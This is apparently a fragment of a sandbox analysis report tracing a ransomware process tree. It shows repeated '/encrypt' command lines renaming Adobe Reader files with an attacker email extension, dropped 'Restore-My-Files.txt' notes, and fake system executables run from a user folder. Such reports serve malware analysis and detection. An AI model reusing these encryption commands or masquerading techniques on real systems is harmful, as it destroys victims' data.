                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:4352
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:5780
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:3748
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:5672
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                          PID:2564
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:764
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:3484
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                              PID:988
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:5008
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:4892
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:6368
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\xk.exe
                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\xk.exe
                                                                                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:7736
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\IExplorer.exe
                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\IExplorer.exe
                                                                                                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:7744
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"
                                                                                                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:7784
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"
                                                                                                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:7800
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE
                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"
                                                                                                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:7656
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE
                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"
                                                                                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:7916
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE
                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"
                                                                                                                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:7972
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6368 -s 576
                                                                                                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                    PID:7648
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\Shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\Shell.exe"
                                                                                                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:7612
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:4860
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                      PID:5976
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:4976
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:4788
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:5412
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:1172
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
